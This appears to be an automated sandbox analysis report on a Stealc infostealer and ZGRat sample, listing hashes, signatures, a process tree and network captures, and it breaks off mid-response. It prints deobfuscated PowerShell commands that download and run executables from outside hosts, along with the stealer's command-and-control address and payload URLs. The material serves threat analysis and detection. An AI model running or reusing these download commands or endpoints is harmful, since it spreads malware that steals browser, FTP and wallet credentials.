stealc | 56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d

Analysis

max time kernel
296s
max time network
244s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
09/05/2024, 22:58 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
Size

49KB
MD5

d58a180c5d85448472b4e1007fae4b2a
SHA1

c07bf8ee2bb73efbf111c2dd753d70bbd84cdb54
SHA256

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d
SHA512

78002ed8c7342d2298f74090afe83572f8373c8e34a3ea9bbc2fc8fed04b2cb3511cb1fd0dd194b1ac41ac0a77ab1cdaa184d34e25cf1b21e4f8990922be3367
SSDEEP

1536:XferrLkSRoe8C4UZsys0Dh1duFpkvFI+Plh:Xfi3k+oWDBDh1duFpjWlh

Score

10^/10

stealc zgrat discovery execution rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

1
(new-object net.webclient).downloadfile("https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000", "stat")
2

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

Extracted

Language

ps1

Deobfuscated

1
(new-object net.webclient).downloadfile("https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000", "i1.exe")
2

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

Extracted

Language

ps1

Deobfuscated

1
$cli = new-object system.net.webclient
2
$cli.headers["User-Agent"] = "InnoDownloadPlugin/1.5"
3
$cli.downloadfile("https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000", "i2.bat")
4

URLs

exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral2/memory/708-192-0x00000200BCB30000-0x00000200C0364000-memory.dmp	family_zgrat_v1
behavioral2/memory/708-193-0x00000200DAB10000-0x00000200DAC1A000-memory.dmp	family_zgrat_v1
behavioral2/memory/708-197-0x00000200C21E0000-0x00000200C2204000-memory.dmp	family_zgrat_v1

Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 5 IoCs

flow	pid	Process
20	204	powershell.exe
22	3032	powershell.exe
23	3032	powershell.exe
25	4500	powershell.exe
27	4500	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
1840	i1.exe
4748	u1f4.0.exe
4780	u1f4.1.exe

Loads dropped DLL 3 IoCs

pid	Process
2520	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
4748	u1f4.0.exe
4748	u1f4.0.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
204	powershell.exe
3032	powershell.exe
4500	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1f4.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1f4.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1f4.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1f4.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1f4.0.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
204	powershell.exe
204	powershell.exe
204	powershell.exe
3032	powershell.exe
3032	powershell.exe
3032	powershell.exe
4500	powershell.exe
4500	powershell.exe
4500	powershell.exe
4748	u1f4.0.exe
4748	u1f4.0.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	204	powershell.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	708	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe
4780	u1f4.1.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 5100	2520	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	73
PID 2520 wrote to memory of 5100	2520	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	73
PID 2520 wrote to memory of 5100	2520	56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe	73
PID 5100 wrote to memory of 204	5100	cmd.exe	75
PID 5100 wrote to memory of 204	5100	cmd.exe	75
PID 5100 wrote to memory of 204	5100	cmd.exe	75
PID 5100 wrote to memory of 3032	5100	cmd.exe	76
PID 5100 wrote to memory of 3032	5100	cmd.exe	76
PID 5100 wrote to memory of 3032	5100	cmd.exe	76
PID 5100 wrote to memory of 1840	5100	cmd.exe	77
PID 5100 wrote to memory of 1840	5100	cmd.exe	77
PID 5100 wrote to memory of 1840	5100	cmd.exe	77
PID 5100 wrote to memory of 4500	5100	cmd.exe	78
PID 5100 wrote to memory of 4500	5100	cmd.exe	78
PID 5100 wrote to memory of 4500	5100	cmd.exe	78
PID 1840 wrote to memory of 4748	1840	i1.exe	79
PID 1840 wrote to memory of 4748	1840	i1.exe	79
PID 1840 wrote to memory of 4748	1840	i1.exe	79
PID 1840 wrote to memory of 4780	1840	i1.exe	81
PID 1840 wrote to memory of 4780	1840	i1.exe	81
PID 1840 wrote to memory of 4780	1840	i1.exe	81
PID 4780 wrote to memory of 708	4780	u1f4.1.exe	83
PID 4780 wrote to memory of 708	4780	u1f4.1.exe	83

C:\Users\Admin\AppData\Local\Temp\56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe
"C:\Users\Admin\AppData\Local\Temp\56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsd5B9E.tmp\app.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:204
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3032
- - C:\Users\Admin\AppData\Local\Temp\i1.exe
    i1.exe /SUB=2838 /str=one
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1840
  - - C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4748
  - - C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:4780
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:708
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4500

Network

DNS

d295fdouc92v9n.cloudfront.net

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

Remote address:

8.8.8.8:53

Request

d295fdouc92v9n.cloudfront.net

IN A

Response

d295fdouc92v9n.cloudfront.net

IN A

13.249.247.72

d295fdouc92v9n.cloudfront.net

IN A

13.249.247.45

d295fdouc92v9n.cloudfront.net

IN A

13.249.247.126

d295fdouc92v9n.cloudfront.net

IN A

13.249.247.88
GET

https://d295fdouc92v9n.cloudfront.net/load/load.php?c=1000

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

Remote address:

13.249.247.72:443

Request

GET /load/load.php?c=1000 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d295fdouc92v9n.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Thu, 09 May 2024 22:59:09 GMT
X-Powered-By: PHP/5.5.38
Content-Description: File Transfer
Content-Disposition: attachment; filename="load.bat"
X-Cache: Miss from cloudfront
Via: 1.1 af2e366d348958e3f4e4b852661686a4.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR61-P1
X-Amz-Cf-Id: Rp-T9p1Trnq_bzWvsr114JbBypH8x_qxg8GRjEkooBBLiPQ8MscAKQ==
DNS

72.247.249.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.247.249.13.in-addr.arpa

IN PTR

Response

72.247.249.13.in-addr.arpa

IN PTR

server-13-249-247-72lhr61r cloudfrontnet
DNS

12.178.204.143.in-addr.arpa

Remote address:

8.8.8.8:53

Request

12.178.204.143.in-addr.arpa

IN PTR

Response

12.178.204.143.in-addr.arpa

IN PTR

server-143-204-178-12lhr50r cloudfrontnet
DNS

79.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.190.18.2.in-addr.arpa

IN PTR

Response

79.190.18.2.in-addr.arpa

IN PTR

a2-18-190-79deploystaticakamaitechnologiescom
DNS

113.216.138.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.216.138.108.in-addr.arpa

IN PTR

Response

113.216.138.108.in-addr.arpa

IN PTR

server-108-138-216-113lhr61r cloudfrontnet
DNS

113.216.138.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.216.138.108.in-addr.arpa

IN PTR
DNS

113.216.138.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.216.138.108.in-addr.arpa

IN PTR
DNS

113.216.138.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.216.138.108.in-addr.arpa

IN PTR
DNS

crl.rootca1.amazontrust.com

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

Remote address:

8.8.8.8:53

Request

crl.rootca1.amazontrust.com

IN A

Response

crl.rootca1.amazontrust.com

IN A

18.245.218.14

crl.rootca1.amazontrust.com

IN A

18.245.218.52

crl.rootca1.amazontrust.com

IN A

18.245.218.88

crl.rootca1.amazontrust.com

IN A

18.245.218.8
DNS

crl.rootca1.amazontrust.com

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

Remote address:

8.8.8.8:53

Request

crl.rootca1.amazontrust.com

IN A
GET

http://crl.rootca1.amazontrust.com/rootca1.crl

56e5aaed7fcbfd493fddd37e86b43030d575d93c7f3ad7b97a4c17164ab1801d.exe

Remote address:

18.245.218.14:80

Request

GET /rootca1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: crl.rootca1.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: binary/octet-stream
Content-Length: 651
Connection: keep-alive
Last-Modified: Tue, 07 May 2024 13:35:04 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: mdb.oNgEZKUEKcLmQL6Vj3efhCCAhom7
Accept-Ranges: bytes
Server: AmazonS3
Date: Thu, 09 May 2024 22:58:32 GMT
ETag: "0d49c9c04d55cf50443a568d38a24928"
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 bcd5ab4165fd59c79d23164add4206c2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR5-P4
X-Amz-Cf-Id: -XVU3FthElsTFm5n16oQOLVk_Lco9cEtGKQmHoQ7LIj2hbKwp1lPCQ==
Age: 38
DNS

14.218.245.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.218.245.18.in-addr.arpa

IN PTR

Response

14.218.245.18.in-addr.arpa

IN PTR

server-18-245-218-14lhr5r cloudfrontnet
DNS

d2iv78ooxaijb6.cloudfront.net

powershell.exe

Remote address:

8.8.8.8:53

Request

d2iv78ooxaijb6.cloudfront.net

IN A

Response

d2iv78ooxaijb6.cloudfront.net

IN A

108.156.32.179

d2iv78ooxaijb6.cloudfront.net

IN A

108.156.32.36

d2iv78ooxaijb6.cloudfront.net

IN A

108.156.32.207

d2iv78ooxaijb6.cloudfront.net

IN A

108.156.32.197
DNS

d2iv78ooxaijb6.cloudfront.net

powershell.exe

Remote address:

8.8.8.8:53

Request

d2iv78ooxaijb6.cloudfront.net

IN A
GET

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

powershell.exe

Remote address:

108.156.32.179:443

Request

GET /load/th.php?a=2836&c=1000 HTTP/1.1
Host: d2iv78ooxaijb6.cloudfront.net
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Thu, 09 May 2024 22:59:13 GMT
X-Powered-By: PHP/5.5.38
X-Cache: Miss from cloudfront
Via: 1.1 ce738519b722f3350531751d4205f8f4.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR50-P1
X-Amz-Cf-Id: oYrbdDE15n0CsXtU6y-PGdrMTM9DuqchV0VHdinrPzQqAaUjemZw6Q==
DNS

179.32.156.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

179.32.156.108.in-addr.arpa

IN PTR

Response

179.32.156.108.in-addr.arpa

IN PTR

server-108-156-32-179lhr50r cloudfrontnet
DNS

179.32.156.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

179.32.156.108.in-addr.arpa

IN PTR
GET

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

powershell.exe

Remote address:

108.156.32.179:443

Request

GET /load/dl.php?id=425&c=1000 HTTP/1.1
Host: d2iv78ooxaijb6.cloudfront.net
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Thu, 09 May 2024 22:59:15 GMT
X-Powered-By: PHP/5.5.38
Location: http://185.172.128.59/ISetup1.exe
X-Cache: Miss from cloudfront
Via: 1.1 ee8862e43d7837ef5478becfe2eb7116.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR50-P1
X-Amz-Cf-Id: 9CSCRCVoyuUyOJLseVT_2ac27db3Fk5xoZrjKvjYzXzfTzc9DmilqQ==
GET

http://185.172.128.59/ISetup1.exe

powershell.exe

Remote address:

185.172.128.59:80

Request

GET /ISetup1.exe HTTP/1.1
Host: 185.172.128.59
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:15 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Thu, 09 May 2024 22:45:01 GMT
ETag: "60201-6180d2b63c7e6"
Accept-Ranges: bytes
Content-Length: 393729
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

59.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.172.185.in-addr.arpa

IN PTR

Response
GET

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

powershell.exe

Remote address:

108.156.32.179:443

Request

GET /load/dl.php?id=444&c=1000 HTTP/1.1
User-Agent: InnoDownloadPlugin/1.5
Host: d2iv78ooxaijb6.cloudfront.net
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Thu, 09 May 2024 22:59:18 GMT
X-Powered-By: PHP/5.5.38
Location: http://240429000936002.mjt.kqri92.top/f/fvgbm0428902.txt
X-Cache: Miss from cloudfront
Via: 1.1 db92535f619848d07c0f5eb965b50adc.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR50-P1
X-Amz-Cf-Id: 5I0Kc1umRbCl0Uu5JLPVCHnrm_Zigc-CbQUGAIQTHxO5zemMH1BZ2g==
DNS

240429000936002.mjt.kqri92.top

powershell.exe

Remote address:

8.8.8.8:53

Request

240429000936002.mjt.kqri92.top

IN A

Response

240429000936002.mjt.kqri92.top

IN A

94.156.35.76
GET

http://240429000936002.mjt.kqri92.top/f/fvgbm0428902.txt

powershell.exe

Remote address:

94.156.35.76:80

Request

GET /f/fvgbm0428902.txt HTTP/1.1
User-Agent: InnoDownloadPlugin/1.5
Host: 240429000936002.mjt.kqri92.top
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Server: Caddy
Status: 404 Not Found
X-Powered-By: PHP/7.3.25
Date: Thu, 09 May 2024 22:59:19 GMT
Content-Length: 17
DNS

76.35.156.94.in-addr.arpa

Remote address:

8.8.8.8:53

Request

76.35.156.94.in-addr.arpa

IN PTR

Response
GET

http://185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=2838

i1.exe

Remote address:

185.172.128.90:80

Request

GET /cpa/ping.php?substr=one&s=ab&sub=2838 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:23 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8
DNS

90.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.128.172.185.in-addr.arpa

IN PTR

Response
DNS

90.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.128.172.185.in-addr.arpa

IN PTR
GET

http://185.172.128.228/ping.php?substr=one

i1.exe

Remote address:

185.172.128.228:80

Request

GET /ping.php?substr=one HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:25 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
GET

http://185.172.128.59/syncUpd.exe

i1.exe

Remote address:

185.172.128.59:80

Request

GET /syncUpd.exe HTTP/1.1
Host: 185.172.128.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:25 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Thu, 09 May 2024 22:45:01 GMT
ETag: "33a00-6180d2b65ac48"
Accept-Ranges: bytes
Content-Length: 211456
Content-Type: application/x-msdos-program
DNS

228.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.128.172.185.in-addr.arpa

IN PTR

Response
GET

http://185.172.128.228/BroomSetup.exe

i1.exe

Remote address:

185.172.128.228:80

Request

GET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:28 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
Content-Type: application/x-msdos-program
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC
Host: 185.172.128.150
Content-Length: 217
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:33 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 156
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBF
Host: 185.172.128.150
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:33 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
Host: 185.172.128.150
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:34 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5416
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH
Host: 185.172.128.150
Content-Length: 4083
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:34 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:34 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
POST

http://185.172.128.150/c698e1bc8a2f5e6d.php

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

POST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH
Host: 185.172.128.150
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:41 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:41 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "a7550-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
GET

http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:47 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "94750-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
GET

http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:49 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "6dde8-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
GET

http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll

u1f4.0.exe

Remote address:

185.172.128.150:80

Request

GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 May 2024 22:59:49 GMT
